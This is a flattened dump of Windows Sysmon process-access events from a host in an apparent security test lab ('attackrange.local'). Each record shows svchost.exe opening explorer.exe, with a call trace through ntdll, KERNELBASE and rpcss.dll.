16:51:27.123{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234806Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:27.123{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234805Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:27.123{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234804Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:27.123{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234803Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:27.123{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234802Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:27.123{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234801Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:27.123{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234800Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:27.123{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234799Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:27.123{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234798Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:27.123{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234797Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:27.123{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234796Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:27.123{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234795Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:27.123{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234794Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:27.123{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234793Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:27.123{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234792Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:27.123{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234791Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:27.123{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234790Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:27.123{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234789Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:27.123{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234788Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:27.123{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234787Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:27.123{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234786Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:27.123{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234785Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:27.123{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234784Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:27.123{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234783Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:27.123{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-59BE-603E-C3A7-00000000AD01}15012C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234782Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:27.123{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-59BE-603E-C3A7-00000000AD01}15012C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234781Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:27.123{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-59BE-603E-C3A7-00000000AD01}15012C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234780Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:27.123{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-59BE-603E-C3A7-00000000AD01}15012C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234779Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:27.123{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-59BE-603E-C3A7-00000000AD01}15012C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234778Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:27.123{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-59BE-603E-C3A7-00000000AD01}15012C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234777Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:27.123{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234776Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:27.123{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234775Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:27.123{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234774Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 